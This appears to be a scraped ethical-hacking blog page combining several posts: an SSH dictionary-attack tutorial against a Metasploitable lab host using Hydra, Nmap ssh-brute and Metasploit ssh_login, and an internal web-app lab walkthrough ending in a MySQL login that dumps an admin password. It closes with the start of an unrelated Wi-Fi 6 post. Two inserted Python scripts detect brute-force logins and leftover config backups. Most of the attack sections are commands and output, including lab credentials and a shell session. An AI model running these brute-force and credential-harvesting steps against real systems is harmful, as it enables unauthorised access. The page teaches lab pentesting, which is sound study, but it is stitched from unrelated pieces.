    Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
    
    Hydra is a tool to guess/crack valid login/password pairs.
    Licensed under AGPL v3.0. The newest version is always available at;
    https://github.com/vanhauser-thc/thc-hydra
    Please don't use in military or secret service organizations, or for illegal
    purposes. (This is a wish and non-binding - most such people do not care about
    laws and ethics anyway - and tell themselves they are one of the good ones.)
    These services were not compiled in: afp ncp oracle sapr3 smb2.
    
    Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
    E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)
         % export HYDRA_PROXY=connect_and_socks_proxylist.txt  (up to 64 entries)
         % export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
         % export HYDRA_PROXY_HTTP=proxylist.txt  (up to 64 entries)
    
    Examples:
      hydra -l user -P passlist.txt ftp://192.168.0.1
      hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
      hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
      hydra -l admin -p password ftp://[192.168.0.0/24]/
      hydra -L logins.txt -P pws.txt -M targets.txt ssh
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$                   
    



    We are going to use the wordlist /home/hackerboy/Desktop/Penetration-tester-jr/user.txt (or rockyou.txt).


    Now, use the Hydra tool to launch the attack.



    Command

    hydra -l msfadmin -P /home/hackerboy/Desktop/Penetration-tester-jr/user.txt ssh://192.168.6.45

    -l
    Login with a single username

    -P
    Load several passwords from the list


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ hydra -l msfadmin -P /home/hackerboy/Desktop/Penetration-tester-jr/user.txt ssh://192.168.6.45 
    Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
    
    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-24 20:33:02
    [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
    [DATA] max 13 tasks per 1 server, overall 13 tasks, 13 login tries (l:1/p:13), ~1 try per task
    [DATA] attacking ssh://192.168.6.45:22/
    [22][ssh] host: 192.168.6.45   login: msfadmin   password: msfadmin
    1 of 1 target successfully completed, 1 valid password found
    [WARNING] Writing restore file because 1 final worker threads did not complete until end.
    [ERROR] 1 target did not resolve or could not be connected
    [ERROR] 0 target did not complete
    Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-24 20:33:05
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$                                                                                                                            
    
    
    


    Brute Force and Password Cracking Live via three different tools



    The password for the msfadmin user is msfadmin.




    Using Nmap Script


    We will run the ssh-brute Nmap script to find the password of the "msfadmin" user.

    Password list used by default by Nmap:

    /usr/share/john/password.lst

    Username list (our own file):

    /home/hackerboy/Desktop/Penetration-tester-jr/user1.txt




    ssh-brute script


    ssh-brute.nse is an Nmap script used to launch dictionary attacks against the SSH service.

    The script takes a username list file and a password list file, which is useful when the target username is not known. In this case, however, we already know the username, "msfadmin", so we will create a new file containing only this username.


    Command


    echo "msfadmin" > user1.txt

    NOTE: msfadmin is our username.



    The password list is "/usr/share/nmap/nselib/data/passwords.lst".

    We can now run the script:


    Command

    nmap -p 22 --script ssh-brute --script-args userdb=/home/hackerboy/Desktop/Penetration-tester-jr/user1.txt 192.168.6.45


     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ sudo nmap -p 22 --script ssh-brute --script-args userdb=/home/hackerboy/Desktop/Penetration-tester-jr/user1.txt 192.168.6.45 
    [sudo] password for hackerboy: 
    Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-24 20:35 IST
    NSE: [ssh-brute] Trying username/password pair: msfadmin:msfadmin
    NSE: [ssh-brute] Trying username/password pair: msfadmin:
    NSE: [ssh-brute] Trying username/password pair: msfadmin:123456
    NSE: [ssh-brute] Trying username/password pair: msfadmin:12345
    NSE: [ssh-brute] Trying username/password pair: msfadmin:123456789
    Nmap scan report for 192.168.6.45
    Host is up (0.00036s latency).
    
    PORT   STATE SERVICE
    22/tcp open  ssh
    | ssh-brute: 
    |   Accounts: 
    |     msfadmin:msfadmin - Valid credentials
    |_  Statistics: Performed 5 guesses in 13 seconds, average tps: 0.4
    MAC Address: 08:00:27:67:67:30 (Oracle VirtualBox virtual NIC)
    
    Nmap done: 1 IP address (1 host up) scanned in 23.21 seconds
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    
    
    
    

     


     


    The password of the "msfadmin" user is msfadmin.






    Using Metasploit


    We can use the auxiliary/scanner/ssh/ssh_login auxiliary module of the Metasploit framework to find the valid password for the "msfadmin" user.

    ssh_login module

    It is an auxiliary scanner module for the SSH service in Metasploit. On success it also opens an SSH shell session.


    Start msfconsole in quiet mode using the -q option.



    Command

    msfconsole -q

     



    Use the auxiliary/scanner/ssh/ssh_login module and set all required target details, i.e. RHOSTS, USERPASS_FILE, STOP_ON_SUCCESS, verbose, etc.



    Password List

    /usr/share/wordlists/metasploit/root_userpass.txt or /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt

     

    Command

    use auxiliary/scanner/ssh/ssh_login
    set RHOSTS 192.168.6.45
    set USERPASS_FILE /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt
    set STOP_ON_SUCCESS true
    set verbose true
    exploit




    RHOSTS: Target IP address

    USERPASS_FILE: Custom username and password file, one user:pass pair per line

    STOP_ON_SUCCESS: If set to true, the operation stops after finding working credentials

    verbose: If set to true, operation logs are shown on the console

     

     


     

     

     



     

    msf6 >
    msf6 > search ssh_login
    
    Matching Modules
    ================
    
       #  Name                                    Disclosure Date  Rank    Check  Description
       -  ----                                    ---------------  ----    -----  -----------
       0  auxiliary/scanner/ssh/ssh_login                          normal  No     SSH Login Check Scanner
       1  auxiliary/scanner/ssh/ssh_login_pubkey                   normal  No     SSH Public Key Login Scanner
    
    
    Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/ssh/ssh_login_pubkey
    
    msf6 > use 0
    msf6 auxiliary(scanner/ssh/ssh_login) > 
    
    
    msf6 auxiliary(scanner/ssh/ssh_login) > 
    msf6 auxiliary(scanner/ssh/ssh_login) > 
    msf6 auxiliary(scanner/ssh/ssh_login) > 
    msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.6.45
    RHOSTS => 192.168.6.45
    msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt
    USERPASS_FILE => /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt
    msf6 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS true
    STOP_ON_SUCCESS => true
    msf6 auxiliary(scanner/ssh/ssh_login) > set verbose true
    verbose => true
    msf6 auxiliary(scanner/ssh/ssh_login) > exploit
    
    [*] 192.168.6.45:22 - Starting bruteforce
    [-] 192.168.6.45:22 - Failed: 'hackerboy:hackerbo'
    [-] 192.168.6.45:22 - Failed: 'hackerboy:hacker'
    [-] 192.168.6.45:22 - Failed: 'hackerboy:atul'
    [-] 192.168.6.45:22 - Failed: 'hackerboy:atulthehackerboy'
    [-] 192.168.6.45:22 - Failed: 'hackerboy:fadsg'
    [-] 192.168.6.45:22 - Failed: 'hackerboy:fdasg'
    [+] 192.168.6.45:22 - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
    [*] Command shell session 2 opened (192.168.6.25:42191 -> 192.168.6.45:22 ) at 2021-12-24 20:00:21 +0530
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf6 auxiliary(scanner/ssh/ssh_login) > 
    
    

     

     




    The password for the "msfadmin" user is msfadmin, as the Success line above shows. The module has also provided an SSH shell.

    Command

    sessions

     

     

    msf6 auxiliary(scanner/ssh/ssh_login) > 
    msf6 auxiliary(scanner/ssh/ssh_login) > 
    msf6 auxiliary(scanner/ssh/ssh_login) > sessions
    
    Active sessions
    ===============
    
      Id  Name  Type         Information                                Connection
      --  ----  ----         -----------                                ----------
      1         shell linux  SSH hackerboy:hackerboy (192.168.6.25:22)  192.168.6.25:41331 -> 192.168.6.25:22  (192.168.6.25)
      2         shell linux  SSH msfadmin:msfadmin (192.168.6.45:22)    192.168.6.25:42191 -> 192.168.6.45:22  (192.168.6.45)
    
    msf6 auxiliary(scanner/ssh/ssh_login) > 
    
    

     

     



    Metasploit framework takes more time for dictionary attacks in comparison to Hydra and Nmap.

    We can use the credentials to access the target machine using the SSH command.



    SSH to the target machine using the credentials of the user "msfadmin".


    Command

    ssh msfadmin@192.168.6.45
    <yes>
    <msfadmin>
    id
    whoami
    ls -la


     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$                                                                                                                             130 ⨯
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ ssh msfadmin@192.168.6.45                                                                                                   130 ⨯
    The authenticity of host '192.168.6.45 (192.168.6.45)' can't be established.
    RSA key fingerprint is SHA256:BQHm5EoHX9GCiOLuVscegPXLQOsuPs+E9d/rrJB84rk.
    This host key is known by the following other names/addresses:
        ~/.ssh/known_hosts:2: [hashed name]
        ~/.ssh/known_hosts:6: [hashed name]
        ~/.ssh/known_hosts:80: [hashed name]
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '192.168.6.45' (RSA) to the list of known hosts.
    msfadmin@192.168.6.45's password: 
    Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
    
    The programs included with the Ubuntu system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.
    
    Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
    applicable law.
    
    To access official Ubuntu documentation, please visit:
    http://help.ubuntu.com/
    No mail.
    Last login: Fri Dec 24 09:17:35 2021
    msfadmin@metasploitable:~$ id
    uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
    msfadmin@metasploitable:~$       
    msfadmin@metasploitable:~$ whoami
    msfadmin
    msfadmin@metasploitable:~$ 
    msfadmin@metasploitable:~$ ls -la
    total 68
    drwxr-xr-x 7 msfadmin msfadmin 4096 2021-07-09 16:15 .
    drwxrwxrwx 7 root     root     4096 2021-06-02 05:32 ..
    lrwxrwxrwx 1 root     root        9 2012-05-14 00:26 .bash_history -> /dev/null
    -rw-r--r-- 1 msfadmin msfadmin    1 2021-06-02 06:04 --checkpoint=1
    -rw-r--r-- 1 msfadmin msfadmin    1 2021-06-02 06:03 --checkpoint-action=exec=sh test.sh
    -rw-r--r-- 1 msfadmin msfadmin    0 2020-12-05 10:37 data.txt
    drwxr-xr-x 4 msfadmin msfadmin 4096 2010-04-17 14:11 .distcc
    drwx------ 2 msfadmin msfadmin 4096 2021-07-13 06:25 .gconf
    drwx------ 2 msfadmin msfadmin 4096 2021-07-13 06:25 .gconfd
    -rw-r--r-- 1 msfadmin msfadmin  891 2021-04-25 08:20 index.html
    -rw-r--r-- 1 msfadmin msfadmin  891 2021-04-25 08:20 index.html.1
    -rw-r--r-- 1 msfadmin msfadmin   14 2021-04-25 08:22 index.html.2
    -rw------- 1 root     root     4174 2012-05-14 02:01 .mysql_history
    -rw-r--r-- 1 msfadmin msfadmin  586 2010-03-16 19:12 .profile
    -rwx------ 1 msfadmin msfadmin    4 2012-05-20 14:22 .rhosts
    drwx------ 2 msfadmin msfadmin 4096 2020-12-05 10:18 .ssh
    -rw-r--r-- 1 msfadmin msfadmin    0 2010-05-07 14:38 .sudo_as_admin_successful
    -rw-r--r-- 1 msfadmin msfadmin   56 2021-06-02 06:03 test.sh
    drwxr-xr-x 6 msfadmin msfadmin 4096 2010-04-27 23:44 vulnerable
    msfadmin@metasploitable:~$ 
    
    
    

     


    This is how we can launch dictionary attacks on services using Hydra, Nmap, and Metasploit.
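The bursts that the Hydra, Nmap and Metasploit runs above generate are easy to spot on the target side. The following added example (not from the original post and not part of any of the three tools) parses constructed OpenSSH auth.log lines and flags both a burst of failures from one source and a success that follows such a burst; the hostname, PIDs and timestamps in the sample are made up to resemble the lab.

```python
"""Detect SSH dictionary attacks in OpenSSH auth.log lines.

Added example for this page; it is not part of the original post or of
Hydra, Nmap or Metasploit. The log excerpt below is constructed to look like
what the Metasploitable target in the walkthrough would record while the
ssh_login module runs: a burst of "Failed password" lines from one source
followed by an "Accepted password" line for another account.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample (not captured from a real host). Syslog lines carry no
# year, so parse_line() takes one as a parameter.
SAMPLE_AUTH_LOG = """\
Dec 24 20:00:10 metasploitable sshd[4400]: Server listening on 0.0.0.0 port 22.
Dec 24 20:00:12 metasploitable sshd[4411]: Failed password for invalid user hackerboy from 192.168.6.25 port 42120 ssh2
Dec 24 20:00:13 metasploitable sshd[4413]: Failed password for invalid user hackerboy from 192.168.6.25 port 42122 ssh2
Dec 24 20:00:14 metasploitable sshd[4415]: Failed password for invalid user hackerboy from 192.168.6.25 port 42124 ssh2
Dec 24 20:00:15 metasploitable sshd[4417]: Failed password for invalid user hackerboy from 192.168.6.25 port 42126 ssh2
Dec 24 20:00:16 metasploitable sshd[4419]: Failed password for invalid user hackerboy from 192.168.6.25 port 42128 ssh2
Dec 24 20:00:17 metasploitable sshd[4421]: Failed password for invalid user hackerboy from 192.168.6.25 port 42130 ssh2
Dec 24 20:00:21 metasploitable sshd[4431]: Accepted password for msfadmin from 192.168.6.25 port 42191 ssh2
Dec 24 20:03:01 metasploitable sshd[4470]: Failed password for msfadmin from 192.168.6.77 port 51001 ssh2
Dec 24 20:03:30 metasploitable sshd[4472]: Failed password for msfadmin from 192.168.6.77 port 51003 ssh2
Dec 24 20:05:02 metasploitable sshd[4502]: Accepted password for msfadmin from 192.168.6.30 port 50122 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2}) +(?P<day>\d{1,2}) (?P<time>\d{2}:\d{2}:\d{2}) "
    r"\S+ sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[0-9a-fA-F.:]+) port \d+"
)


def parse_line(line, year=2021):
    """Return (timestamp, accepted, user, ip) for a password auth line, else None."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(
        f"{year} {m['mon']} {m['day']} {m['time']}", "%Y %b %d %H:%M:%S"
    )
    return ts, m["result"] == "Accepted", m["user"], m["ip"]


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Scan chronological log lines and return a list of alert tuples.

    ("burst", ip, user, n)               n failures from ip within the window
    ("success_after_burst", ip, user, n) a login accepted from an ip that had
                                         n >= threshold recent failures, which
                                         is the signature a successful
                                         dictionary attack leaves behind
    """
    recent_failures = defaultdict(list)  # ip -> failure timestamps in window
    burst_reported = set()
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ts, accepted, user, ip = rec
        window = [t for t in recent_failures[ip]
                  if (ts - t).total_seconds() <= window_seconds]
        if accepted:
            if len(window) >= threshold:
                alerts.append(("success_after_burst", ip, user, len(window)))
            # A success ends the burst; start counting afresh for this source.
            recent_failures[ip] = []
            burst_reported.discard(ip)
            continue
        window.append(ts)
        recent_failures[ip] = window
        if len(window) >= threshold and ip not in burst_reported:
            alerts.append(("burst", ip, user, len(window)))
            burst_reported.add(ip)
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(alert)
```

The two failures from 192.168.6.77 stay below the threshold and the isolated success from 192.168.6.30 raises nothing, so only the 192.168.6.25 sequence is reported.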



    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. They do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.

     

     

  • Penetration Testing on Internal Web Application


    Penetration Testing on Internal Web Application

     

     

    Representation


    You are a Penetration Tester hired by the company AwdMgmt to perform security tests on their internal Web Application and machines. You are asked to perform the penetration test on the client premises. During this engagement you are not given a well-defined scope. You are sitting in the client corporate building, directly attached to the client network.




    Objective


    The objective is to first find the web servers in the network you are directly attached to, then to test the web application running on them in order to check whether you can access restricted areas (such as the login page)!



    Tools


    The best tools for this lab are -

    # Dirbuster
    # mysql
    # Web browser



    Follow the Step -


    1) Find all the machines in the network

    2) Identify the machines role

    3) Explore the web application

    4) Find hidden files

    5) Test the credentials found

    6) Retrieve the correct admin password


    Solution steps


    Find all the machines in the network

    We first need to find the address of the corporate network we are connected to. We can do so by running ifconfig and checking the IP address of our tap0 interface.



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ ifconfig           
    eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
            ether b4:b6:86:47:55:83  txqueuelen 1000  (Ethernet)
            RX packets 0  bytes 0 (0.0 B)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 0  bytes 0 (0.0 B)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
            inet 127.0.0.1  netmask 255.0.0.0
            inet6 ::1  prefixlen 128  scopeid 0x10<host>
            loop  txqueuelen 1000  (Local Loopback)
            RX packets 12329  bytes 1183972 (1.1 MiB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 12329  bytes 1183972 (1.1 MiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    tap0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet 10.104.11.50  netmask 255.255.255.0  broadcast 0.0.0.0
            inet6 fe80::8cfa:99ff:fe9b:3351  prefixlen 64  scopeid 0x20<link>
            ether 8e:fa:99:9b:33:51  txqueuelen 1000  (Ethernet)
            RX packets 4679  bytes 256538 (250.5 KiB)
            RX errors 0  dropped 2  overruns 0  frame 0
            TX packets 5763  bytes 321536 (314.0 KiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet 192.168.6.25  netmask 255.255.255.0  broadcast 192.168.6.255
            inet6 2409:4064:e0b:64bf:9407:d0bc:70d9:cc95  prefixlen 64  scopeid 0x0<global>
            inet6 fe80::aa80:f129:e78d:aa96  prefixlen 64  scopeid 0x20<link>
            ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
            RX packets 95039  bytes 105443523 (100.5 MiB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 56428  bytes 9346057 (8.9 MiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    


    As we can see, the target network is 10.104.11.0/24. Let's run nmap with the -sn option in order to discover all the available hosts on the network.





    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ sudo nmap -sn 10.104.11.0/24 
    Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-21 19:28 IST
    Nmap scan report for 10.104.11.96
    Host is up (0.61s latency).
    MAC Address: 00:50:56:A5:F5:80 (VMware)
    Nmap scan report for 10.104.11.198
    Host is up (0.64s latency).
    MAC Address: 00:50:56:A5:F5:80 (VMware)
    Nmap scan report for 10.104.11.50
    Host is up.
    Nmap done: 256 IP addresses (3 hosts up) scanned in 14.65 seconds
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    



    The previous command shows that, apart from our own address (10.104.11.50), there are only two hosts alive in the network: 10.104.11.96 and 10.104.11.198.

     


    Identify the machines role


    Let us run nmap in order to gather information about the services listening on our targets. For this we will run a -sV scan as follows:



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ sudo nmap -sV 10.104.11.96,198
    Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-21 19:29 IST
    Nmap scan report for 10.104.11.96
    Host is up (0.85s latency).                                                         
    Not shown: 998 closed tcp ports (reset)                                        
    PORT   STATE SERVICE VERSION                                       
    22/tcp open  ssh     OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
    80/tcp open  http    Apache httpd 2.2.22 ((Debian))
    MAC Address: 00:50:56:A5:03:17 (VMware)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Nmap scan report for 10.104.11.198
    Host is up (0.91s latency).
    Not shown: 998 closed tcp ports (reset)
    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
    3306/tcp open  mysql   MySQL 5.5.38-0+wheezy1
    MAC Address: 00:50:56:A5:F5:80 (VMware)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 2 IP addresses (2 hosts up) scanned in 143.46 seconds
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]                                                                
    └─$ 
    
    



    From the results, we can see that the machine with IP address 10.104.11.96 is running Apache on port 80, meaning that it is probably hosting the internal web application, while the other machine (10.104.11.198) is running MySQL.

    Since the scope of the engagement is to check if an attacker can access restricted areas of the web application, let's focus our tests on the machine 10.104.11.96.




    Explore the web application


    In order to inspect the web application we just need to type the IP address of the target machine into our browser.





    If we inspect the web application, we can see that the "Sign up" page is not available, meaning that we cannot create a new user in order to access the restricted area.

    Moreover, we do not have any valid credentials to use, and the login form does not seem vulnerable to SQL injection.


    Find hidden files


    Since we do not want to bruteforce the login form, we can try to run discovery tools such as dirbuster in order to find hidden files that may help us with our goal.






    Let us start dirbuster and run a scan using the directory-list-2.3-small.txt file. After a minute or two, we should start getting some interesting results:










    Here we can see that in the include folder there is a file named config.old. Let us inspect it and see if there is anything interesting in it:







    As we can see, the file contains some database credentials! If you recall, in the previous steps we had found a machine running MySQL. Let us try a DB connection to this machine with the credentials just found:


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ mysql -u awd -pUcuijsQgGOFILdjdL8D -h 10.104.11.198
    ERROR 1045 (28000): Access denied for user 'awd'@10.104.11.10' (using password: YES)
                                                                                                                                          
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$                                                                                                                             
    
    
    


    Unfortunately, it seems that the credentials are not valid. Let us keep investigating the files found with dirbuster. If we check the previous screenshot, we can see that there is a page named signup.php that we were not able to access from the links in the web application:





    This is even better than the previous file found!
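The config.old copy that dirbuster found is the kind of leftover a deployment check should catch before the web server ever serves it. The following added example (not from the original post and not part of DirBuster) walks a web root from the inside, flags editor and backup copies, and reports which of them still carry credential-looking settings; the sample tree, file names and the placeholder password in it are constructed for the example.

```python
"""Find leftover configuration backups in a web root before they are served.

Added example for this page; it is not part of the original post or of
DirBuster. The lab found include/config.old (a copy of the real config) by
brute-forcing file names from outside; this check walks the deployed tree
from the inside and flags editor and backup copies, noting which of them
still carry credential-looking settings. The sample web root and its file
contents are constructed here (hypothetical values), so the script runs
offline.
"""
import os
import re
import shutil
import tempfile

# Names that editors and admins leave behind and that web servers will serve.
BACKUP_SUFFIXES = (".old", ".bak", ".orig", ".save", ".swp", "~")
# Heuristic: a key such as password/pass/pwd/secret/token followed by = or :
CRED_RE = re.compile(r"(?i)(password|passwd|pass|pwd|secret|api_?key|token)\s*[:=]")


def is_backup_name(name):
    """True for config.old, settings.php.bak, index.php~, .config.php.swp, ..."""
    return name.lower().endswith(BACKUP_SUFFIXES)


def contains_credentials(path):
    """True if any line of the file looks like a credential assignment."""
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            return any(CRED_RE.search(line) for line in fh)
    except OSError:
        return False


def audit_webroot(root):
    """Return sorted (relative_path, has_credentials) pairs for backup-looking files."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if not is_backup_name(name):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            findings.append((rel, contains_credentials(full)))
    return sorted(findings)


def build_sample_webroot():
    """Create a constructed tree modelled on the lab layout; returns its path."""
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, "include"))
    files = {
        "index.php": "<?php require 'include/config.php'; ?>\n",
        # live config reads the secret from the environment: nothing to leak
        "include/config.php": "<?php\n$db_user = 'awd';\n$db_pass = getenv('DB_PASS');\n",
        # stale copy with a literal password (placeholder value, not the lab's)
        "include/config.old": "<?php\n$db_user = 'awd';\n$db_pass = 'EXAMPLE_ONLY';\n",
        "signup.php.bak": "<?php // disabled sign-up page, nothing sensitive here\n",
    }
    for rel, content in files.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


def cleanup(root):
    """Remove the constructed sample tree."""
    shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    sample = build_sample_webroot()
    try:
        for rel, leaks in audit_webroot(sample):
            print(f"{rel}: {'CREDENTIALS' if leaks else 'no secrets'}")
    finally:
        cleanup(sample)
```

Pointed at a real document root instead of the sample tree, the same walk lists exactly the files a directory brute-forcer would otherwise be the first to find.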


    Test the credentials found


    Let us try the credentials found in the signup.php file and see if we are able to access the DB!

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]                                                                
    └─$                                                        130 ⨯
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ mysql -u awdmgmt -pUChxKQk96dVtM07 -h 10.104.11.198               130 ⨯
    Welcome to the MariaDB monitor.  Commands end with ; or \g.
    Your MySQL connection id is 241
    Server version: 5.5.38-0+wheezy1 (Debian)
    
    Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
    
    Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
    
    MySQL [(none)]>
    
    

     

     



    As we can see, this time we are successfully logged into the database! Let us inspect it!



    Retrieve the correct admin password


    Let us use some simple mysql commands to navigate the database and check if there is anything interesting in it. First, we will have to select the database to use and then inspect its tables and data, as follows:


    MySQL [(none)]> use awdmgmt_accounts;
    Reading table information for completion of table and column names
    You can turn off this feature to get a quicker startup with -A
    
    Database changed
    MySQL [awdmgmt_accounts]> show tables;
    +----------------------------+
    | Tables_in_awdmgmt_accounts |
    +----------------------------+
    | accounts                   |
    +----------------------------+
    1 row in set (0.528 sec)
    
    MySQL [awdmgmt_accounts]> select * from accounts;
    +----+--------------------+----------+-------------+
    | id | email              | password | displayname |
    +----+--------------------+----------+-------------+
    |  1 | admin@awdmgmt.labs | ENS7VvW8 | Admin       |
    +----+--------------------+----------+-------------+
    1 row in set (0.898 sec)
    
    MySQL [awdmgmt_accounts]> 
    
    
    


    With the information just obtained, let us try to log into the web application:








  • The biggest contribution of wifi 6 to technology

     

    The biggest contribution of wifi 6 to technology

     

     

    Wifi 6

    Hello Guys. In this blog we're going to talk about the 802.11ax wireless standard, which is more commonly known as Wi-Fi 6. Wi-Fi 6 was released in 2019 and is the latest wireless standard used in wireless devices; it is the successor to the 802.11ac standard, known as Wi-Fi 5.

    Now Wi-Fi 6 is faster than Wi-Fi 5, but speed wasn't necessarily its main goal. The main goal of Wi-Fi 6 was to make a Wi-Fi network perform better when a lot of devices are connected to it. This is because today there are so many devices in our homes that use Wi-Fi, such as computers, tablets, phones, security cameras, refrigerators, light switches, thermostats, and much more. With so many devices competing for the Wi-Fi signal, a network can slow down, because a Wi-Fi router can only communicate with so many devices at a time.






